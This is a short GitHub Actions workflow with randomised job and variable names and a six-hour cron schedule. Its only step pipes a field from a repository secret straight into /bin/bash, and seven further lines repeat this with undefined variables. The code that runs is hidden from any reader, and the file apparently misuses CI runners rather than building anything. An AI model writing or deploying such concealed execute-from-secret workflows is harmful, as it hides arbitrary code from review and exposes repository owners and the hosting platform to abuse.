name: luzhanyuan7654

on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luzhanyuan7654
        env:
          ekr05836: ${{ secrets.ekr05836 }}
        run: |
          echo $ekr05836 | jq -r .vj0961 | /bin/bash
          echo $a10 | jq -r .wbi9 | /bin/bash
          echo $f095 | jq -r .kj25263 | /bin/bash
          echo $oauk89 | jq -r .wahlz6 | /bin/bash
          echo $yjkfi4628 | jq -r .dxo223 | /bin/bash
          echo $owfgo43 | jq -r .j00 | /bin/bash
          echo $hmp5 | jq -r .c73635 | /bin/bash
          echo $zzy85919 | jq -r .ank9 | /bin/bash

